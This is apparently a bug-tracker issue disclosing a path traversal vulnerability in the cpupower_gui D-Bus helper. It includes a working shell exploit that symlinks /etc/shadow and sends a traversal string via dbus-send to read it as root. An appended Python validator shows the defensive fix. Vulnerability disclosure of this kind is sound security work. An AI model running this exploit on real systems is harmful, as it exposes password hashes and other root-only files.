path traversal vulnerability in org.rnd2.cpupower_gui.helper.settings due to variant types
lindi2 opened this issue
Type of the "cpu" argument in org.rnd2.cpupower_gui.helper.settings is not specified explicitly using the in_signature keyword argument of the decorator. The default type is a variant type, which means that the method can be called such that "cpu" is actually a string. The string is then used to construct a file path that is then opened as root. This allows any user on the system to read the first line of any file on the system. Or it would, if the "settings" method actually returned the settings (currently, it just prints it to stdout).
Here's an exploit example:
```
mkdir /tmp/cpufreq
ln -s /sys/devices/system/cpu/cpu0/cpufreq/scaling_max_freq /tmp/cpufreq
ln -s /sys/devices/system/cpu/cpu0/cpufreq/scaling_min_freq /tmp/cpufreq
ln -s /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_min_freq /tmp/cpufreq
ln -s /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq /tmp/cpufreq
ln -s /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor /tmp/cpufreq
ln -s /etc/shadow /tmp/cpufreq/scaling_available_governors
dbus-send --system --dest=org.rnd2.cpupower_gui.helper --type=method_call --print-reply /org/rnd2/cpupower_gui/helper org.rnd2.cpupower_gui.helper.settings variant:string:0/../../../../../tmp
```
A similar problem also affects "update_cpu_settings" and allows any authorized user to write any file on the system.
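As an added example (not code from the report or from the cpupower_gui project), the following Python helper shows the input handling a root D-Bus helper needs before it turns a "cpu" argument into a sysfs path: an integer type check, a range check, and an allowlist of attribute names, with a final containment check as defence in depth. The function name `cpufreq_path`, the `ALLOWED_ATTRS` set and the `ncpus` parameter are assumptions for this example; with dbus-python, declaring `in_signature='i'` on the method would additionally make the bus reject a string variant before the handler runs.

```python
import os

# Sysfs root the helper is allowed to touch (matches the paths in the report).
CPU_SYSFS_ROOT = "/sys/devices/system/cpu"

# Hypothetical allowlist of cpufreq attributes the helper may read or write.
ALLOWED_ATTRS = frozenset({
    "scaling_max_freq", "scaling_min_freq", "cpuinfo_min_freq",
    "cpuinfo_max_freq", "scaling_governor", "scaling_available_governors",
})


def cpufreq_path(cpu, attr, root=CPU_SYSFS_ROOT, ncpus=None):
    """Return /sys/.../cpu<N>/cpufreq/<attr> for a validated cpu index.

    Raises ValueError for anything that is not a plain int in range, or for
    an attribute outside the allowlist, so a variant carrying a string such as
    "0/../../../../../tmp" never reaches the path construction at all.
    """
    # bool is a subclass of int; reject it along with every non-int type.
    if isinstance(cpu, bool) or not isinstance(cpu, int):
        raise ValueError("cpu must be an int, got %s" % type(cpu).__name__)
    if ncpus is None:
        ncpus = os.cpu_count() or 1
    if not 0 <= cpu < ncpus:
        raise ValueError("cpu index %d out of range 0..%d" % (cpu, ncpus - 1))
    if attr not in ALLOWED_ATTRS:
        raise ValueError("attribute %r is not an allowed cpufreq file" % (attr,))
    path = os.path.join(root, "cpu%d" % cpu, "cpufreq", attr)
    # Defence in depth: after normalisation the path must still sit under root.
    if os.path.commonpath([root, os.path.normpath(path)]) != root:
        raise ValueError("constructed path escapes %s" % root)
    return path


def rejects(cpu, attr, ncpus=4):
    """True if cpufreq_path refuses the arguments (used to exercise the checks)."""
    try:
        cpufreq_path(cpu, attr, ncpus=ncpus)
    except ValueError:
        return True
    return False
```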